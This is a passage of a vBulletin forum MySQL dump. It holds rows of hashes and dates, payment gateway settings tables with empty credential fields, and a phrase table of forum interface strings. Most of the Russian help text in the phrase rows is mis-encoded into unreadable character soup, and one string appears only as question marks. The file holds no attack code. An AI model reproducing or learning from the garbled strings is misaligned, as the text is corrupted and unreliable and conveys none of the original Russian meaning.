(100, '75bef7a69f129df588f59e36bbcc592b', '2016-02-22'),
(384, '5ddafc810a6478e1938fe443301dfe40', '2016-02-22'),
(1, '70ea01fe71fcf2d6131bef3b006b2d8e', '2016-02-23'),
(383, 'a5448d3ac4412e4a0619ebd6e6efca1a', '2016-02-27'),
(383, 'bfae6875ae5ae91e72fdde5c5ec72e71', '2016-02-27'),
(385, '336b4ce8b00965629a9ec27ec2dc7ce6', '2016-02-29'),
(383, '8eb0c975f965ad231899eca0fe7db0cc', '2016-03-04'),
(11, '5807d6227380aaaebebd067db1b431e0', '2016-03-16'),
(383, '1f63e610416dbf8ff203eff4b4b84e18', '2016-03-23'),
(29, '7fcd2cf8e6048a22f4110739656a975c', '2016-03-25'),
(386, 'bb7da842d629c2f9318a4df0fe5cc85b', '2016-04-04'),
(164, '41599d14321f9f7c196e5ed48dea5234', '2016-05-05'),
(387, 'd36732cd86143018da9b60694d72fc95', '2016-05-19'),
(387, '300e5610365d743b4f60f59c0267da6b', '2016-05-19'),
(388, 'a6b8eaad9dca37c84b36b113154feb93', '2016-05-20'),
(295, 'df753c5ed9c4bb8f68a92682e6cd4cbf', '2016-05-22'),
(287, '3bd4bcc3f7afc12b07e3d5ca3d0e1fbf', '2016-05-29'),
(295, '16f1cb4cbc3cd75636c7ce450082d353', '2016-06-04'),
(100, '88af7a42ea982cafd8873c30fa86e8c8', '2016-06-06'),
(348, '2088f1caa7ab7c8e52fa73d28936c5dd', '2016-06-12');
DROP TABLE IF EXISTS `paymentapi`;
CREATE TABLE `paymentapi` (
`paymentapiid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`currency` varchar(250) NOT NULL DEFAULT '',
`recurring` smallint(6) NOT NULL DEFAULT '0',
`classname` varchar(250) NOT NULL DEFAULT '',
`active` smallint(6) NOT NULL DEFAULT '0',
`settings` mediumtext,
PRIMARY KEY (`paymentapiid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `paymentapi` (`paymentapiid`, `title`, `currency`, `recurring`, `classname`, `active`, `settings`) VALUES
(1, 'Paypal', 'usd,gbp,eur,aud,cad', 1, 'paypal', 0, 'a:2:{s:7:\"ppemail\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:12:\"primaryemail\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(2, 'NOCHEX', 'gbp', 0, 'nochex', 0, 'a:1:{s:8:\"ncxemail\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(3, 'Worldpay', 'usd,gbp,eur', 0, 'worldpay', 0, 'a:2:{s:15:\"worldpay_instid\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:17:\"worldpay_password\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(4, 'Authorize.Net', 'usd,gbp,eur', 0, 'authorizenet', 0, 'a:3:{s:17:\"authorize_loginid\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:6:\"txnkey\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:19:\"authorize_md5secret\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(5, '2Checkout', 'usd', 0, '2checkout', 0, 'a:2:{s:14:\"twocheckout_id\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"number\";}s:11:\"secret_word\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(6, 'Moneybookers', 'usd,gbp,eur,aud,cad', 0, 'moneybookers', 0, 'a:2:{s:7:\"mbemail\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:8:\"mbsecret\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}'),
(7, 'CCBill', 'usd', 0, 'ccbill', 0, 'a:6:{s:12:\"clientAccnum\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:12:\"clientSubacc\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:8:\"formName\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:10:\"secretword\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:8:\"username\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}s:8:\"password\";a:3:{s:4:\"type\";s:4:\"text\";s:5:\"value\";s:0:\"\";s:8:\"validate\";s:6:\"string\";}}');
DROP TABLE IF EXISTS `paymentinfo`;
CREATE TABLE `paymentinfo` (
`paymentinfoid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`hash` varchar(32) NOT NULL DEFAULT '',
`subscriptionid` smallint(5) unsigned NOT NULL DEFAULT '0',
`subscriptionsubid` smallint(5) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`completed` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`paymentinfoid`),
KEY `hash` (`hash`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `paymenttransaction`;
CREATE TABLE `paymenttransaction` (
`paymenttransactionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`paymentinfoid` int(10) unsigned NOT NULL DEFAULT '0',
`transactionid` varchar(250) NOT NULL DEFAULT '',
`state` smallint(5) unsigned NOT NULL DEFAULT '0',
`amount` double unsigned NOT NULL DEFAULT '0',
`currency` varchar(5) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`paymentapiid` int(10) unsigned NOT NULL DEFAULT '0',
`request` mediumtext,
`reversed` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`paymenttransactionid`),
KEY `dateline` (`dateline`),
KEY `transactionid` (`transactionid`),
KEY `paymentapiid` (`paymentapiid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `phrase`;
CREATE TABLE `phrase` (
`phraseid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`languageid` smallint(6) NOT NULL DEFAULT '0',
`varname` varchar(250) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`fieldname` varchar(20) NOT NULL DEFAULT '',
`text` mediumtext,
`product` varchar(25) NOT NULL DEFAULT '',
`username` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`version` varchar(30) NOT NULL DEFAULT '',
PRIMARY KEY (`phraseid`),
UNIQUE KEY `name_lang_type` (`varname`,`languageid`,`fieldname`),
KEY `languageid` (`languageid`,`fieldname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `phrase` (`phraseid`, `languageid`, `varname`, `fieldname`, `text`, `product`, `username`, `dateline`, `version`) VALUES
(1, 0, 'field1_title', 'cprofilefield', 'Biography', 'vbulletin', '', 0, ''),
(2, 0, 'field1_desc', 'cprofilefield', 'A few details about yourself', 'vbulletin', '', 0, ''),
(3, 0, 'field2_title', 'cprofilefield', 'Location', 'vbulletin', '', 0, ''),
(4, 0, 'field2_desc', 'cprofilefield', 'Where you live', 'vbulletin', '', 0, ''),
(5, 0, 'field3_title', 'cprofilefield', 'Interests', 'vbulletin', '', 0, ''),
(6, 0, 'field3_desc', 'cprofilefield', 'Your hobbies, etc', 'vbulletin', '', 0, ''),
(7, 0, 'field4_title', 'cprofilefield', 'Occupation', 'vbulletin', '', 0, ''),
(8, 0, 'field4_desc', 'cprofilefield', 'Your job', 'vbulletin', '', 0, ''),
(9, 0, 'reputation1', 'reputationlevel', 'is infamous around these parts', 'vbulletin', '', 0, ''),
(10, 0, 'reputation2', 'reputationlevel', 'can only hope to improve', 'vbulletin', '', 0, ''),
(11, 0, 'reputation3', 'reputationlevel', 'has a little shameless behaviour in the past', 'vbulletin', '', 0, ''),
(12, 0, 'reputation4', 'reputationlevel', 'is an unknown quantity at this point', 'vbulletin', '', 0, ''),
(13, 0, 'reputation5', 'reputationlevel', 'is on a distinguished road', 'vbulletin', '', 0, ''),
(14, 0, 'reputation6', 'reputationlevel', 'will become famous soon enough', 'vbulletin', '', 0, ''),
(15, 0, 'reputation7', 'reputationlevel', 'has a spectacular aura about', 'vbulletin', '', 0, ''),
(16, 0, 'reputation8', 'reputationlevel', 'is a jewel in the rough', 'vbulletin', '', 0, ''),
(17, 0, 'reputation9', 'reputationlevel', 'is just really nice', 'vbulletin', '', 0, ''),
(18, 0, 'reputation10', 'reputationlevel', 'is a glorious beacon of light', 'vbulletin', '', 0, ''),
(19, 0, 'reputation11', 'reputationlevel', 'is a name known to all', 'vbulletin', '', 0, ''),
(20, 0, 'reputation12', 'reputationlevel', 'is a splendid one to behold', 'vbulletin', '', 0, ''),
(21, 0, 'reputation13', 'reputationlevel', 'has much to be proud of', 'vbulletin', '', 0, ''),
(22, 0, 'reputation14', 'reputationlevel', 'has a brilliant future', 'vbulletin', '', 0, ''),
(23, 0, 'reputation15', 'reputationlevel', 'has a reputation beyond repute', 'vbulletin', '', 0, ''),
(24, 0, 'infractionlevel1_title', 'infractionlevel', 'Spammed Advertisements', 'vbulletin', '', 0, ''),
(25, 0, 'infractionlevel2_title', 'infractionlevel', 'Insulted Other Member(s)', 'vbulletin', '', 0, ''),
(26, 0, 'infractionlevel3_title', 'infractionlevel', 'Signature Rule Violation', 'vbulletin', '', 0, ''),
(27, 0, 'infractionlevel4_title', 'infractionlevel', 'Inappropriate Language', 'vbulletin', '', 0, ''),
(10828, 0, 'next_picture_short', 'accessmask', '????.', 'vbulletin', 'Jelsoft', 1247672370, '3.8.3'),
(21599, -1, 'accessmask_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîëüçîâà òåëè \r\nÃà ñòðîéêè ïîëüçîâà òåëÿ \r\nÃëîêèðîâêà ïîëüçîâà òåëåé \r\nÃà ññûëêà \r\nÌà ñêè äîñòóïà \r\nÌà ñêè äîñòóïà : \r\nÌà ñêè äîñòóïà ïîçâîëÿþò âà ì ðà çðåøà òü/çà ïðåùà òü ïðîñìîòð ðà çäåëà êîÃêðåòÃîìó ïîëüçîâà òåëþ, áåç ñîçäà Ãèÿ îòäåëüÃîé ãðóïïû ïîëüçîâà òåëåé. Ñèñòåìà ìà ñîê äîñòóïà ðà áîòà åò ñîâìåñòÃî ñ ñèñòåìîé ðà çãðà Ãè÷åÃèÿ ïðà â ôîðóìà . \r\n Ãðèìå÷à Ãèå: Ãà ñëåäîâà Ãèå ïðà â çäåñü òà êæå èìååò ìåñòî; åñëè âû ðà çðåøèëè ïîëüçîâà òåëþ ïðîñìîòð ðîäèòåëüñêîãî ðà çäåëà , åìó òà êæå áóäåò ðà çðåøåÃî ïðîñìà òðèâà òü âñå ïîäðà çäåëû. \r\nÂû äîëæÃû âêëþ÷èòü ìà ñêè äîñòóïà â Ãà ñòðîéêà õ ôîðóìà , èÃà ÷å óñòà ÃîâëåÃÃûå çäåñü ïðà âà ÃÃ¥ áóäóò ðà áîòà òü.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21600, -1, 'accessmask_title', 'cphelptext', 'Î ìà ñêà õ äîñòóïà ', 'vbulletin', '', 0, ''),
(21601, -1, 'accessmask_edit_text', 'cphelptext', 'Ãèæå - ñïèñîê ïîëüçîâà òåëåé, äëÿ êîòîðûõ óñòà ÃîâëåÃû ìà ñêè äîñòóïà ê ýòîìó ðà çäåëó. Çäåñü âû ìîæåòå ðåäà êòèðîâà òü äîñòóï ýòèõ ïîëüçîâà òåëåé ê ðà çäåëó Ãà óðîâÃÃ¥ êîÃêðåòÃîãî ïîëüçîâà òåëÿ (ò.Ã¥. ÃÃ¥ Ãà óðîâÃÃ¥ ãðóïïû). \r\nÃðîâåðüòå çäåñü , ÷òî âêëþ÷åÃû ìà ñêè äîñòóïà , èÃà ÷å óñòà ÃîâëåÃÃûå çäåñü ïðà âà äëÿ ïîëüçîâà òåëåé ÃÃ¥ áóäóò ðà áîòà òü.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(21602, -1, 'accessmask_edit_title', 'cphelptext', 'Ìà ñêè äîñòóïà äëÿ ýòîãî ðà çäåëà ', 'vbulletin', '', 0, ''),
(21603, -1, 'accessmask_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå âèäåòü, êà êèå èç ðà çäåëîâ èìåþò ìà ñêè äîñòóïà . (ÃîìÃèòå, Ãà ñëåäîâà Ãèå ïðà â çäåñü òà êæå äåéñòâóåò! Åñëè ïîëüçîâà òåëþ ðà çðåøåÃî èëè çà ïðåùåÃî ÷òî-ëèáî â ðîäèòåëüñêîì ðà çäåëå, ýòî áóäåò óÃà ñëåäîâà Ãî âñåìè åãî ïîäðà çäåëà ìè, åñëè â Ãèõ ÿâÃî ÃÃ¥ óêà çà Ãû èÃûå ïðà âà äëÿ ýòîãî ïîëüçîâà òåëÿ.) \r\nÂû òà êæå ìîæåòå âèäåòü ñïèñîê ïîëüçîâà òåëåé, êîìó ðà çðåøåÃ/çà ïðåùåà äîñòóï, ëèáî âñåõ ïîëüçîâà òåëåé, èìåþùèõ ñâÿçà ÃÃûå ñ ýòèì ðà çäåëîì ìà ñêè äîñòóïà . Âû òà êæå ìîæåòå ñáðîñèòü (óäà ëèòü) âñå ìà ñêè äîñòóïà ýòîãî ðà çäåëà , Ãà æà â Ãà ññûëêó \"Ñáðîñ\". \r\nÄëÿ óäà ëåÃèÿ âñåõ ìà ñîê äîñòóïà ÂÑÅÕ ðà çäåëîâ âû ìîæåòå âîñïîëüçîâà òüñÿ ññûëêîé \"Óäà ëèòü âñå ìà ñêè äîñòóïà \" â âåðõÃåé ÷à ñòè ýòîé ñòðà Ãèöû. (Ó âà ñ áóäåò çà ïðîøåÃî ïîäòâåðæäåÃèå. Îïåðà öèÿ Ãåîáðà òèìà .) \r\n\"Ãûñòðûé ðåäà êòîð ìà ñîê äîñòóïà \" ïîçâîëÿåò óïðà âëÿòü äîñòóïîì ñ ïîìîùüþ ïðîñòîãî âûáîðà âà ðèà Ãòîâ \"Äà \", \"Ãåò\" è \"Ãî óìîë÷à Ãèþ\" äëÿ êà æäîé ìà ñêè äîñòóïà , óñêîðÿÿ ïðîöåññ ìà ññîâîãî èçìåÃÃ¥Ãèÿ ïðà â.', 'vbulletin', '', 0, ''),
(21604, -1, 'accessmask_modify_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå äîñòóïà ê ðà çäåëà ì', 'vbulletin', '', 0, ''),
(21605, -1, 'accessmask_quickedit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ïðåäñòà âëåà ñïèñîê âñåõ ìà ñîê äîñòóïà ôîðóìà . Êà æäà ÿ ìà ñêà îòîáðà æà åòñÿ ñòðîêîé, ñîäåðæà ùåé èìÿ ïîëüçîâà òåëÿ, ðà çäåë, ê êîòîðîìó ïðèìåÃÿåòñÿ ìà ñêà , è ïåðåêëþ÷à òåëè \"Äà \", \"Ãåò\", \"Ãî óìîë÷à Ãèþ\", äëÿ ñîîòâåòñòâåÃÃî: ïðåäîñòà âëåÃèÿ äîñòóïà , îòêà çå â Ãåì è èñïîëüçîâà Ãèÿ ïðà â ïî óìîë÷à Ãèþ äëÿ äà ÃÃîãî ðà çäåëà /ãðóïïû ïîëüçîâà òåëåé. (Óñòà Ãîâêà ëþáîé ñòðîêè â \"Ãî óìîë÷à Ãèþ\" ôà êòè÷åñêè óäà ëèò äà ÃÃóþ ìà ñêó.) ÊÃîïêè \"Âñå äà \", \"Âñå Ãåò\", è \"Âñå ïî óìîë÷à Ãèþ\" ïîçâîëÿþò áûñòðî ïðîèçâåñòè ìà ññîâîå ïåðåêëþ÷åÃèå îïöèé.', 'vbulletin', '', 0, ''),
(21606, -1, 'accessmask_quickedit_title', 'cphelptext', 'Ãûñòðûé ðåäà êòîð ìà ñîê äîñòóïà ', 'vbulletin', '', 0, ''),
(21607, -1, 'accessmask_resetall_text', 'cphelptext', 'Ãà æìèòå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ ÂÑÅÕ ìà ñîê äîñòóïà . Ãòà îïåðà öèÿ Ãåîáðà òèìà !', 'vbulletin', '', 0, ''),
(21608, -1, 'accessmask_resetall_title', 'cphelptext', 'Óäà ëèòü âñå ìà ñêè äîñòóïà ', 'vbulletin', '', 0, ''),
(21609, -1, 'admincalendar_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÊà ëåÃäà ðè \r\nÃðà âà óïðà âëåÃèÿ êà ëåÃäà ðåì \r\nÊà ëåÃäà ðè: \r\nÔîðóì èìååò äîâîëüÃî ðà çâèòóþ ñèñòåìó êà ëåÃäà ðåé. Êðîìå ïóáëè÷Ãûõ è ÷à ñòÃûõ êà ëåÃäà ðåé ôîðóì ìîæåò èìåòü ìÃîæåñòâî êà ëåÃäà ðåé ñ ðà çãðà Ãè÷åÃèåì äîñòóïà Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé. \r\nÓïðà âëÿòü êà ëåÃäà ðÿìè î÷åÃü ïðîñòî. Ãðè ñîçäà Ãèè Ãîâîãî êà ëåÃäà ðÿ êà ê îáðà çåö èñïîëüçóåòñÿ êà ëåÃäà ðü ïî óìîë÷à Ãèþ, â êîòîðîì äîñòóïÃî áîëüøèÃñòâî âîçìîæÃîñòåé. Âû ìîæåòå ïðîñìîòðåòü è îòðåäà êòèðîâà òü ýòîò êà ëåÃäà ðü, èñïîëüçóÿ óïðà âëåÃèå êà ëåÃäà ðÿìè (â Ãà âèãà öèîÃÃîì ìåÃþ ñëåâà - Êà ëåÃäà ðè > Óïðà âëåÃèå êà ëåÃäà ðÿìè). (Ñì. Ãåäà êòèðîâà Ãèå êà ëåÃäà ðÿ ) \r\nÒà êæå âû ìîæåòå Ãà çÃà ÷èòü ìîäåðà òîðîâ äëÿ óïðà âëåÃèÿ êà æäûì èç êà ëåÃäà ðåé. Ñîçäà éòå êà ëåÃäà ðü, â óïðà âëåÃèè êà ëåÃäà ðÿìè èñïîëüçóéòå îïöèþ \"Äîáà âèòü\" â ïðà âîì âûïà äà þùåì ìåÃþ Ãà ïðîòèâ òîãî êà ëåÃäà ðÿ, êîòîðîìó âû õîòèòå Ãà çÃà ÷èòü ìîäåðà òîðà . (Ñì. Äîáà âëåÃèå ìîäåðà òîðà êà ëåÃäà ðÿ ) \r\nÒà êæå â Óïðà âëåÃèè êà ëåÃäà ðÿìè âû ìîæåòå ðåäà êòèðîâà òü ïðà âà ñóùåñòâóþùèõ ìîäåðà òîðîâ - ïðîñòî âûáåðèòå èìÿ ìîäåðà òîðà â âûïà äà þùåì ìåÃþ ñïðà âà (Ñì. Ãåäà êòèðîâà Ãèå ïðà â ìîäåðà òîðîâ êà ëåÃäà ðÿ ) \r\nÇäåñü æå ìîæÃî îòðåäà êòèðîâà òü ëþáîé ñóùåñòâóþùèé êà ëåÃäà ðü, âûáðà â \"ÈçìåÃèòü\" â âûïà äà þùåì ìåÃþ ðÿäîì ñ Ãà çâà Ãèåì êà ëåÃäà ðÿ. (Ñì. Ãåäà êòèðîâà Ãèå êà ëåÃäà ðÿ ) \r\nÃîñëå òîãî, êà ê îòðåäà êòèðîâà à êà ëåÃäà ðü ïî óìîë÷à Ãèþ (åñëè òðåáóåòñÿ), Ãà åãî îñÃîâå âû ìîæåòå ñîçäà òü Ãîâûé êà ëåÃäà ðü. Äëÿ ýòîãî âûáåðèòå ïóÃêò \"Äîáà âèòü êà ëåÃäà ðü\" â Ãà âèãà öèîÃÃîì ìåÃþ ñëåâà (ðà çäåë Êà ëåÃäà ðè). (Ñì. Äîáà âëåÃèå êà ëåÃäà ðÿ ) \r\nÃîñëå ñîçäà Ãèÿ Ãîâîãî êà ëåÃäà ðÿ, âû ìîæåòå äîáà âèòü â Ãåãî äîïîëÃèòåëüÃûå ïîëÿ, ÷òîáû îáëåã÷èòü ââîä èÃôîðìà öèè, ñïåöèôè÷Ãîé èìåÃÃî äëÿ ýòîãî êà ëåÃäà ðÿ. Äëÿ ýòîãî â Óïðà âëåÃèè êà ëåÃäà ðÿìè âûáåðèòå \"ÈçìåÃèòü\" â âûïà äà þùåì ìåÃþ óïðà âëåÃèÿ ðÿäîì ñ Ãà çâà Ãèåì ÃóæÃîãî êà ëåÃäà ðÿ, çà òåì âûáåðèòå îïöèþ \"Äîáà âèòü äîïîëÃèòåëüÃîå ïîëå\". (Ñì. Äîáà âëåÃèå/Ãåäà êòèðîâà Ãèå äîï. ïîëåé êà ëåÃäà ðÿ ) \r\nÊîãäà ñîçäà Ãèå êà ëåÃäà ðÿ çà âåðøåÃî, ìîæÃî óñòà Ãîâèòü ïðà âà äîñòóïà ê Ãåìó. Êà æäà ÿ ãðóïïà ïîëüçîâà òåëåé èìååò òà êèå æå ïðà âà äîñòóïà ê âÃîâü ñîçäà ÃÃîìó êà ëåÃäà ðþ, êà êèå óñòà ÃîâëåÃû åé â êà ëåÃäà ðå ïî óìîë÷à Ãèþ. Âû ìîæåòå èçìåÃèòü èõ, âûáðà â ïóÃêò \"Ãðà âà êà ëåÃäà ðÿ\" (â ðà çäåëå \"Êà ëåÃäà ðè\") â Ãà âèãà öèîÃÃîì ìåÃþ ñëåâà . (Ñì. Ãåäà êòèðîâà Ãèå ïðà â êà ëåÃäà ðÿ Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé ) \r\nÓïðà âëåÃèå ïðà çäÃèêà ìè ïîçâîëÿåò äîáà âëÿòü è óäà ëÿòü ïðà çäÃèêè â ñèñòåìå êà ëåÃäà ðåé. Êà æäûé êà ëåÃäà ðü ìîæåò áûòü îòäåëüÃî Ãà ñòðîåà äëÿ îòîáðà æåÃèÿ èëè ÃÃ¥ îòîáðà æåÃèÿ ïðà çäÃèêîâ. (Ñì. Ãåäà êòèðîâà Ãèå ïðà çäÃèêîâ )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21610, -1, 'admincalendar_title', 'cphelptext', 'ÃŽ êà ëåÃäà ðÿõ', 'vbulletin', '', 0, ''),
(21611, -1, 'admincalendar_add_text', 'cphelptext', 'Ñîáûòèÿ, êîòîðûå äîáà âëÿþòñÿ è ïîòîì îòîáðà æà þòñÿ â êà æäîì èç êà ëåÃäà ðåé, ñâÿçà Ãû òîëüêî ñî ñâîèì êà ëåÃäà ðåì. Ãðà çäÃèêè è äÃè ðîæäåÃèÿ áóäóò îòîáðà æà òüñÿ âî âñåõ êà ëåÃäà ðÿõ, åñëè ÿâÃî ÃÃ¥ âûáðà Ãî èÃîå. Êà æäûé êà ëåÃäà ðü ìîæåò èìåòü ðà çëè÷Ãûå ïðà âà äîñòóïà è ðà çëè÷Ãûõ ìîäåðà òîðîâ. \r\nÃðèìåðîì èñïîëüçîâà Ãèÿ ìîæåò ñëóæèòü ôîðóì äëÿ Ãåñêîëüêèõ ñïîðòèâÃûõ øêîëüÃûõ êîìà Ãä, êà æäà ÿ èç êîòîðûõ îáðà çóåò ñâîþ ãðóïïó ïîëüçîâà òåëåé. Âû ìîæåòå ñîçäà òü êà ëåÃäà ðè äëÿ êà æäîé èç ãðóïï è ñêîÃôèãóðèðîâà òü èõ òà êèì îáðà çîì, ÷òîáû êà æäà ÿ ãðóïïà èìåëà äîñòóï òîëüêî ê ñâîåìó êà ëåÃäà ðþ. \r\nÎïöèè ýòîé ñòðà Ãèöû îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(21612, -1, 'admincalendar_add_title', 'cphelptext', 'Äîáà âëåÃèå Ãîâîãî êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(21613, -1, 'admincalendar_add_edit_title_text', 'cphelptext', 'Ãòî çà ãîëîâîê (Ãà çâà Ãèå) êà ëåÃäà ðÿ, Ãà ïðèìåð \"ÖåðêîâÃûé êà ëåÃäà ðü\" èëè \"ÇÃà ìåÃà òåëüÃûå ñîáûòèÿ Ãà øåãî ôîðóìà \".', 'vbulletin', '', 0, ''),
(21614, -1, 'admincalendar_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(21615, -1, 'admincalendar_add_edit_displayorder_text', 'cphelptext', 'Ãòî ïîðÿäîê, â êîòîðîì îòîáðà æà þòñÿ êà ëåÃäà ðè â âûïà äà þùåì ìåÃþ \"Êà ëåÃäà ðü\" è â ïà Ãåëè à äìèÃèñòðà òîðà . Óñòà Ãîâèòå çÃà ÷åÃèå 0, ÷òîáû ÃÃ¥ îòîáðà æà òü êà ëåÃäà ðü êîÃå÷Ãîìó ïîëüçîâà òåëþ, îäÃà êî äà æå â ýòîì ñëó÷à å ïîëüçîâà òåëü ñìîæåò ïîëó÷èòü äîñòóï ê ýòîìó êà ëåÃäà ðþ, Ãà áðà â ïðà âèëüÃûé URL.', 'vbulletin', '', 0, ''),
(21616, -1, 'admincalendar_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(21617, -1, 'admincalendar_add_edit_customfields_text', 'cphelptext', 'Ãîêà âû åùå ÃÃ¥ ñîõðà Ãèëè âà øè Ãà ñòðîéêè êà ëåÃäà ðÿ, âû ÃÃ¥ ñìîæåòå äîáà âëÿòü äîïîëÃèòåëüÃûå ïîëÿ. Ãîñëå ïåðâîãî ñîõðà ÃÃ¥Ãèÿ Ãà ñòðîåê âû ïîëó÷èòå âîçìîæÃîñòü èõ äîáà âëåÃèÿ è ðåäà êòèðîâà Ãèÿ. (Ñì. Äîáà âëåÃèå/Ãåäà êòèðîâà Ãèå äîï. ïîëåé êà ëåÃäà ðÿ .)', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21618, -1, 'admincalendar_add_edit_customfields_title', 'cphelptext', 'ÄîïîëÃèòåëüÃûå ïîëÿ', 'vbulletin', '', 0, ''),
(21619, -1, 'admincalendar_add_edit_neweventemail_text', 'cphelptext', 'Ââåäèòå à äðåñà ýëåêòðîÃÃîé ïî÷òû, Ãà êà æäûé èç êîòîðûõ áóäóò Ãà ïðà âëåÃû óâåäîìëåÃèÿ î äîáà âëåÃèè Ãîâîãî ñîáûòèÿ â ýòîò êà ëåÃäà ðü. Ãà çäåëÿéòå à äðåñà ïðîáåëà ìè èëè ïåðåâîäîì ñòðîêè.', 'vbulletin', 'zCarot', 1172226865, '3.6.5'),
(21620, -1, 'admincalendar_add_edit_neweventemail_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû äëÿ óâåäîìëåÃèé î Ãîâûõ ñîáûòèÿõ', 'vbulletin', '', 0, ''),
(21621, -1, 'admincalendar_add_edit_moderatenew_text', 'cphelptext', 'Åñëè îïöèÿ óñòà ÃîâëåÃà â \"Äà \", ìîäåðà òîðû, îòâåòñòâåÃÃûå çà ýòîò êà ëåÃäà ðü, ëèáî âû, êà ê à äìèÃèñòðà òîð, äîëæÃû áóäóò ïðîñìîòðåòü è ïîäòâåðäèòü êà æäîå äîáà âëåÃÃîå ïîëüçîâà òåëÿìè ñîáûòèå, ïðåæäå ÷åì îÃî Ãà ÷Ãåò îòîáðà æà òüñÿ â êà ëåÃäà ðå.', 'vbulletin', '', 0, ''),
(21622, -1, 'admincalendar_add_edit_moderatenew_title', 'cphelptext', 'Ãðîâåðêà ñîáûòèé', 'vbulletin', '', 0, ''),
(21623, -1, 'admincalendar_add_edit_daterange_text', 'cphelptext', 'Ââåäèòå ïåðâûé è ïîñëåäÃèé ãîäû, îòîáðà æà åìûå â êà ëåÃäà ðå, ðà çäåëèâ èõ òèðå. Ãà ïðèìåð, 2000-2006 .  ñâÿçè ñ îãðà Ãè÷åÃèÿìè PHP, äèà ïà çîà äîïóñòèìûõ ãîäîâ îãðà Ãè÷åà çÃà ÷åÃèÿìè îò 1970 äî 2037; ââîä çÃà ÷åÃèé, âûõîäÿùèõ çà ýòîò äèà ïà çîÃ, ìîæåò ïðèâåñòè ê îøèáêà ì.', 'vbulletin', '', 0, ''),
(21624, -1, 'admincalendar_add_edit_daterange_title', 'cphelptext', 'Äèà ïà çîà äà ò', 'vbulletin', '', 0, ''),
(21625, -1, 'admincalendar_add_edit_default_text', 'cphelptext', 'Óñòà Ãà âëèâà åò òèï îòîáðà æåÃèÿ êà ëåÃäà ðÿ ïî óìîë÷à Ãèþ. Âû ìîæåòå âûáðà òü îòîáðà æåÃèå êà ëåÃäà ðÿ Ãà Ãåäåëþ, ìåñÿö èëè ãîä.', 'vbulletin', '', 0, ''),
(21626, -1, 'admincalendar_add_edit_default_title', 'cphelptext', 'Âà ðèà Ãò îòîáðà æåÃèÿ êà ëåÃäà ðÿ ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
